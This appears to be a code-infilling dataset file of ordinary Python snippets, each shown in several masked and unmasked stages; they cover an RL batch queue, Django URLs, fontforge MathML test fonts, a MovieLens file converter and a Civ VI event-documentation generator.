class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
def _push_one(self, state, action, reward):
self.traces_s.append(state)
self.traces_a.append(action)
self.traces_r.append(reward)
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:
batch_size], self.traces_r[:batch_size]
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
self.q_batch.put((res_s, res_a, res_r))
| import torch
import torch.multiprocessing as mp
import random
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device('cuda' if torch.cuda.is_available() else
'cpu')
def _push_one(self, state, action, reward):
self.traces_s.append(state)
self.traces_a.append(action)
self.traces_r.append(reward)
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:
batch_size], self.traces_r[:batch_size]
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
self.q_batch.put((res_s, res_a, res_r))
| import torch
import torch.multiprocessing as mp
import random
class QManeger(object):
def __init__(self, opt, q_trace, q_batch):
self.traces_s = []
self.traces_a = []
self.traces_r = []
self.lock = mp.Lock()
self.q_trace = q_trace
self.q_batch = q_batch
self.opt = opt
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def _push_one(self, state, action, reward):
self.traces_s.append(state)
self.traces_a.append(action)
self.traces_r.append(reward)
def listening(self):
while True:
traces = self.q_trace.get(block=True)
for s, a, r in zip(traces[0], traces[1], traces[2]):
self._push_one(s, a, r)
if len(self.traces_s) > self.opt.batch_size:
self.produce_batch()
def produce_batch(self):
batch_size = self.opt.batch_size
res_s, res_a, res_r = self.traces_s[:batch_size], self.traces_a[:batch_size], \
self.traces_r[:batch_size]
# delete
del self.traces_s[:batch_size]
del self.traces_a[:batch_size]
del self.traces_r[:batch_size]
res_s = torch.FloatTensor(res_s).to(self.device)
res_a = torch.LongTensor(res_a).to(self.device)
res_r = torch.FloatTensor(res_r).to(self.device).view(-1, 1)
# stack batch and put
self.q_batch.put((res_s, res_a, res_r))
| [
3,
4,
5,
6,
7
] |
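A hypothetical wiring of QManeger into an actor/learner loop (SimpleNamespace stands in for the real opt object, and the trace values are made up; the sketch assumes CPU tensors, since sharing CUDA tensors across processes needs extra care):
import torch.multiprocessing as mp
from types import SimpleNamespace

if __name__ == '__main__':
    opt = SimpleNamespace(batch_size=2)   # the only field QManeger reads
    q_trace, q_batch = mp.Queue(), mp.Queue()
    maneger = QManeger(opt, q_trace, q_batch)
    # the bound method (and its mp.Lock) is inherited/pickled by the child
    mp.Process(target=maneger.listening, daemon=True).start()
    # an actor pushes one trace of (states, actions, rewards):
    q_trace.put(([[0.0], [1.0], [2.0]], [0, 1, 0], [0.5, 0.5, 1.0]))
    # the learner blocks until a ready-made batch of tensors arrives:
    states, actions, rewards = q_batch.get()  # batch_size rows each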
69 | 3c0beb7be29953ca2d7b390627305f4541b56efa | <mask token>
def test_main_cnv():
main_cnv(tarfile)
<mask token>
| <mask token>
sys.path.append('../circos_report/cnv_anno2conf')
<mask token>
def test_main_cnv():
main_cnv(tarfile)
if __name__ == '__main__':
test_main_cnv()
| <mask token>
sys.path.append('../circos_report/cnv_anno2conf')
<mask token>
tarfile = {'yaml': 'data/test_app.yaml'}
def test_main_cnv():
main_cnv(tarfile)
if __name__ == '__main__':
test_main_cnv()
| import sys
sys.path.append('../circos_report/cnv_anno2conf')
from cnv_anno2conf import main_cnv
tarfile = {'yaml': 'data/test_app.yaml'}
def test_main_cnv():
main_cnv(tarfile)
if __name__ == '__main__':
test_main_cnv()
| import sys
sys.path.append("../circos_report/cnv_anno2conf")
from cnv_anno2conf import main_cnv
tarfile = {"yaml": "data/test_app.yaml"}
def test_main_cnv():
main_cnv(tarfile)
if __name__ == "__main__":
test_main_cnv()
| [
1,
2,
3,
4,
5
] |
70 | 8d0fcf0bf5effec9aa04e7cd56b4b7098c6713cb | <mask token>
| for i in range(-10, 0):
print(i, end=' ')
| for i in range(-10,0):
print(i,end=" ") | null | null | [
0,
1,
2
] |
71 | a14114f9bb677601e6d75a72b84ec128fc9bbe61 | <mask token>
| <mask token>
urlpatterns = [path('admin/', admin.site.urls), path('api/', include(
'api.urls')), path('api/adv/', include('adventure.urls'))]
| from django.contrib import admin
from django.urls import path, include, re_path
from django.conf.urls import include
from rest_framework.authtoken import views
urlpatterns = [path('admin/', admin.site.urls), path('api/', include(
'api.urls')), path('api/adv/', include('adventure.urls'))]
| from django.contrib import admin
from django.urls import path, include, re_path
from django.conf.urls import include
# from rest_framework import routers
from rest_framework.authtoken import views
# from adventure.api import PlayerViewSet, RoomViewSet
# from adventure.api import move
# router = routers.DefaultRouter()
# router.register('rooms', RoomViewSet)
# router.register('currentRoom', PlayerViewSet)
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include('api.urls')),
path('api/adv/', include('adventure.urls')),
# path('api-token-auth', views.obtain_auth_token)
]
| null | [
0,
1,
2,
3
] |
72 | edb206a8cd5bc48e831142d5632fd7eb90abd209 | import tensorflow as tf
optimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss)
_, l = sess.run([optimizer, loss], feed_dict={X:x, Y:y})
Session looks at all trainable variables that loss depends on and updates them (see the runnable sketch below)
tf.Variable(initial_value=None, trainable=True, collections=None, validate_shape=True, caching_device=None,
name=None, variable_def=None, dtype=None, expected_shape=None, import_scope=None)
List of optimizers in TF
1. tf.train.GradientDescentOptimizer
2. tf.train.AdagradOptimizer
3. tf.train.MomentumOptimizer
4. tf.train.AdamOptimizer
5. tf.train.ProximalGradientDescentOptimizer
6. tf.train.ProximalAdagradOptimizer
7. tf.train.RMSPropOptimizer
And more | null | null | null | null | [
0
] |
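A runnable sketch of the pattern the notes above describe (TensorFlow 1.x API assumed; X, Y, w, b and the squared-error loss are illustrative):
import tensorflow as tf  # TensorFlow 1.x (tf.train.* optimizers, sessions)

X = tf.placeholder(tf.float32, name='X')
Y = tf.placeholder(tf.float32, name='Y')
w = tf.Variable(0.0, name='w')  # trainable=True by default
b = tf.Variable(0.0, name='b')
loss = tf.square(Y - (w * X + b), name='loss')

# minimize() collects the trainable variables loss depends on (w and b here)
optimizer = tf.train.GradientDescentOptimizer(0.001).minimize(loss)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for x, y in [(1.0, 2.0), (2.0, 4.0), (3.0, 6.0)]:
        _, l = sess.run([optimizer, loss], feed_dict={X: x, Y: y})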
73 | 36991c3191ba48b1b9dbd843e279f8fe124f1339 | <mask token>
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
<mask token>
<mask token>
def regen_resource(self):
pass
def full_resource(self):
pass
| <mask token>
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass
def heal(self, target):
pass
def regen_resource(self):
pass
def full_resource(self):
pass
| __author__ = 'Jager'
<mask token>
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass
def heal(self, target):
pass
def regen_resource(self):
pass
def full_resource(self):
pass
| __author__ = 'Jager'
from char import Character
class Rouge(Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass
def heal(self, target):
pass
def regen_resource(self):
pass
def full_resource(self):
pass
| __author__ = 'Jager'
from char import Character
class Rouge (Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def heal(self, target):
pass # hook method
def regen_resource(self):
pass # hook method
def full_resource(self):
pass | [
4,
6,
7,
8,
9
] |
74 | 0de657ee173b606ad61d614a6168c00fcd571a70 | <mask token>
| <mask token>
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = 2010, 2310
infile = os.path.join(cached_outputs, f'{ffi_in}.nc')
outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
x.writeNAFiles(outfile, delimiter=',', float_format='%g')
| import os
from .common import cached_outputs, data_files, test_outputs
import nappy.nc_interface.na_to_nc
import nappy.nc_interface.nc_to_na
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = 2010, 2310
infile = os.path.join(cached_outputs, f'{ffi_in}.nc')
outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
x.writeNAFiles(outfile, delimiter=',', float_format='%g')
| import os
from .common import cached_outputs, data_files, test_outputs
import nappy.nc_interface.na_to_nc
import nappy.nc_interface.nc_to_na
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = (2010, 2310)
infile = os.path.join(cached_outputs, f"{ffi_in}.nc")
outfile = os.path.join(test_outputs, f"{ffi_out}_from_nc_{ffi_in}.na")
# Reading: infile
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
# Writing: outfile
x.writeNAFiles(outfile, delimiter=",", float_format="%g")
| null | [
0,
1,
2,
3
] |
75 | 06638b361c1cbe92660d242969590dfa45b63a4d | <mask token>
| <mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
<mask token>
mathfont.save(f)
| <mask token>
v1 = 5 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (
v1, v2), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = v1
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 6 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = v1
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 4 * mathfont.em
f = mathfont.create('stack-displaystylegapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = v
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 8 * mathfont.em
f = mathfont.create('stack-gapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = v
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 3 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2
), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = v1
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 9 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = v1
mathfont.save(f)
| from utils import mathfont
import fontforge
v1 = 5 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomdisplaystyleshiftdown%d-axisheight%d' % (
v1, v2), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = v1
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 6 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-bottomshiftdown%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = v1
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 4 * mathfont.em
f = mathfont.create('stack-displaystylegapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = v
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 8 * mathfont.em
f = mathfont.create('stack-gapmin%d' % v,
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = v
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 3 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topdisplaystyleshiftup%d-axisheight%d' % (v1, v2
), 'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = v1
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 9 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create('stack-topshiftup%d-axisheight%d' % (v1, v2),
'Copyright (c) 2016 MathML Association')
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = v1
mathfont.save(f)
| #!/usr/bin/env python3
from utils import mathfont
import fontforge
v1 = 5 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-bottomdisplaystyleshiftdown%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = v1
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 6 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-bottomshiftdown%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = v1
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 4 * mathfont.em
f = mathfont.create("stack-displaystylegapmin%d" % v,
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = v
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v = 8 * mathfont.em
f = mathfont.create("stack-gapmin%d" % v,
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = 0
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = v
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 3 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-topdisplaystyleshiftup%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = v1
f.math.StackTopShiftUp = 0
mathfont.save(f)
v1 = 9 * mathfont.em
v2 = 1 * mathfont.em
f = mathfont.create("stack-topshiftup%d-axisheight%d" % (v1, v2),
"Copyright (c) 2016 MathML Association")
f.math.AxisHeight = v2
f.math.StackBottomDisplayStyleShiftDown = 0
f.math.StackBottomShiftDown = 0
f.math.StackDisplayStyleGapMin = 0
f.math.StackGapMin = 0
f.math.StackTopDisplayStyleShiftUp = 0
f.math.StackTopShiftUp = v1
mathfont.save(f)
| [
0,
1,
2,
3,
4
] |
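The six blocks in the row above differ only in which stack constant is nonzero and whether AxisHeight is set; a table-driven equivalent (a sketch with behavior assumed identical, not the source's layout):
from utils import mathfont

em = mathfont.em
stack_params = ('StackBottomDisplayStyleShiftDown', 'StackBottomShiftDown',
                'StackDisplayStyleGapMin', 'StackGapMin',
                'StackTopDisplayStyleShiftUp', 'StackTopShiftUp')
cases = [('StackBottomDisplayStyleShiftDown', 5 * em, 1 * em),
         ('StackBottomShiftDown', 6 * em, 1 * em),
         ('StackDisplayStyleGapMin', 4 * em, 0),
         ('StackGapMin', 8 * em, 0),
         ('StackTopDisplayStyleShiftUp', 3 * em, 1 * em),
         ('StackTopShiftUp', 9 * em, 1 * em)]
for param, v, axis in cases:
    name = 'stack-%s%d' % (param[len('Stack'):].lower(), v)
    if axis:
        name += '-axisheight%d' % axis
    f = mathfont.create(name, 'Copyright (c) 2016 MathML Association')
    f.math.AxisHeight = axis
    for p in stack_params:   # zero everything, then set the one under test
        setattr(f.math, p, 0)
    setattr(f.math, param, v)
    mathfont.save(f)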
76 | 2dd59681a0dcb5d3f1143385100c09c7783babf4 | <mask token>
| <mask token>
for line in ratings_dat:
arr = line.split('::')
new_line = '\t'.join(arr)
ratings_csv.write(new_line)
ratings_dat.close()
ratings_csv.close()
| ratings_dat = open('../data/movielens-1m/users.dat', 'r')
ratings_csv = open('../data/movielens-1m/users.txt', 'w')
for line in ratings_dat:
arr = line.split('::')
new_line = '\t'.join(arr)
ratings_csv.write(new_line)
ratings_dat.close()
ratings_csv.close()
| #!/usr/bin/env python
# script :: creating a datamodel that fits mahout from users.dat
ratings_dat = open('../data/movielens-1m/users.dat', 'r')
ratings_csv = open('../data/movielens-1m/users.txt', 'w')
for line in ratings_dat:
arr = line.split('::')
new_line = '\t'.join(arr)
ratings_csv.write(new_line)
ratings_dat.close()
ratings_csv.close()
| null | [
0,
1,
2,
3
] |
77 | 5ce98ae241c0982eeb1027ffcff5b770f94ff1a3 | <mask token>
| <mask token>
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'
argumentName = row[4]
argumentType = row[5][1:]
        if eventName not in events:
            events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
eventIndices[eventType] = f
f.write('## Static Events\n')
    f.write('Events can be subscribed to by using `' + eventType +
'.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
indexEntry = '| [[' + eventType + '.' + eventName + ']] | '
if len(arguments) > 0:
indexEntry += '<br/>'.join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
fullName = eventType + '.' + eventName
filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +
eventName + '.md')
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
f.write('# ' + fullName + '\n')
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = ', '.join(arguments)
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
f.write('Regular event: you can subscribe to it through `' + fullName +
""".Add(<function handler>)`
""")
f.write('\n')
f.write('### Parameters\n')
argumentsList = '\n- '.join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| <mask token>
events = {}
eventTypes = set()
eventIndices = {}
i = 0
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'
argumentName = row[4]
argumentType = row[5][1:]
        if eventName not in events:
            events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
eventIndices[eventType] = f
f.write('## Static Events\n')
    f.write('Events can be subscribed to by using `' + eventType +
'.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
indexEntry = '| [[' + eventType + '.' + eventName + ']] | '
if len(arguments) > 0:
indexEntry += '<br/>'.join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
fullName = eventType + '.' + eventName
filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +
eventName + '.md')
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
f.write('# ' + fullName + '\n')
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = ', '.join(arguments)
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
f.write('Regular event: you can subscribe to it through `' + fullName +
""".Add(<function handler>)`
""")
f.write('\n')
f.write('### Parameters\n')
argumentsList = '\n- '.join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| import csv
import os
events = {}
eventTypes = set()
eventIndices = {}
i = 0
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = 'GameEvents' if len(row[10]) > 0 else 'Events'
argumentName = row[4]
argumentType = row[5][1:]
try:
events[eventName]
except Exception:
events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
eventIndices[eventType] = f
f.write('## Static Events\n')
f.write('Events can be subscribed by using `' + eventType +
'.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
indexEntry = '| [[' + eventType + '.' + eventName + ']] | '
if len(arguments) > 0:
indexEntry += '<br/>'.join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
fullName = eventType + '.' + eventName
filename = ('../EventObjects/' + eventType + '/' + eventType + '.' +
eventName + '.md')
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, 'w')
f.write('# ' + fullName + '\n')
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = ', '.join(arguments)
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
    f.write('Regular event: you can subscribe to it through `' + fullName +
        '.Add(<function handler>)`\n')
f.write('\n')
f.write('### Parameters\n')
argumentsList = '\n- '.join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| import csv
import os
events = {}
eventTypes = set()
eventIndices = {}
i = 0
with open('Civ VI Modding Companion - Events.csv', newline='') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
if i < 4:
i += 1
continue
eventName = row[3]
eventType = "GameEvents" if len(row[10]) > 0 else "Events"
argumentName = row[4]
argumentType = row[5][1:]
try:
events[eventName]
except Exception:
events[eventName] = {'eventType': eventType, 'arguments': []}
eventTypes.add(eventType)
if argumentName:
argumentText = '`' + argumentName
if argumentType:
argumentText += ' [' + argumentType + ']'
argumentText += '`'
# argument = {'argumentName': argumentName, 'argumentType': argumentType, 'argumentText': argumentText}
events[eventName]['arguments'].append(argumentText)
for eventType in eventTypes:
filename = '../EventObjects/' + eventType + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, "w")
eventIndices[eventType] = f
f.write('## Static Events\n')
f.write('Events can be subscribed by using `' + eventType + '.SomeEvent.Add(SomeFunction)`.\n')
f.write('\n')
f.write('| Name | Parameters |\n')
f.write('|:---- |:--------- |\n')
for eventName in events:
event = events[eventName]
eventType = event['eventType']
eventIndex = eventIndices[eventType]
arguments = event['arguments']
# -----------------------
# Create Index Entry
# -----------------------
indexEntry = '| [[' + eventType + "." + eventName + ']] | '
if len(arguments) > 0:
indexEntry += "<br/>".join(arguments)
indexEntry += ' |\n'
eventIndex.write(indexEntry)
# -----------------------
# Create Event File
# -----------------------
fullName = eventType + '.' + eventName
filename = '../EventObjects/' + eventType + '/' + eventType + "." + eventName + '.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
f = open(filename, "w")
f.write('# ' + fullName + "\n")
f.write('## Description\n')
f.write('TBD\n')
f.write('\n')
f.write('## Usage\n')
argumentsText = (", ".join(arguments))
argumentsText = argumentsText.replace('`', '')
f.write('> `' + fullName + '(' + argumentsText + ')`\n\n')
f.write('Regular event: you can subscribe to it through `' + fullName + '.Add(<function handler>)`\n')
f.write('\n')
f.write('### Parameters\n')
argumentsList = "\n- ".join(arguments)
if len(argumentsList) > 0:
argumentsList = '- ' + argumentsList
f.write(argumentsList)
| [
0,
1,
2,
3,
4
] |
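Note: every variant above opens its Markdown files with bare open() calls and never closes them, so the writes only flush when the interpreter exits. A minimal standalone sketch of the same CSV-to-Markdown pattern using context managers; the input filename is hypothetical, and the column layout (event name in column 3, GameEvents flag in column 10, four header rows) is an assumption carried over from the row above:

import csv
import os

events = {}
with open('events.csv', newline='') as csvfile:  # hypothetical input file
    for i, row in enumerate(csv.reader(csvfile, delimiter=',', quotechar='|')):
        if i < 4:  # skip the four header rows, as in the original
            continue
        event_type = 'GameEvents' if len(row[10]) > 0 else 'Events'
        events.setdefault(row[3], {'eventType': event_type, 'arguments': []})

for name, event in events.items():
    path = os.path.join('EventObjects', event['eventType'], name + '.md')
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as f:  # closed (and flushed) automatically
        f.write('# ' + event['eventType'] + '.' + name + '\n')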
78 | 79c043fc862e77bea5adc3f1c6bb9a6272f19c75 | <mask token>
| <mask token>
name = socket.gethostname()
| import socket
name = socket.gethostname()
| #!/usr/bin/env python
import socket
name = socket.gethostname()
| null | [
0,
1,
2,
3
] |
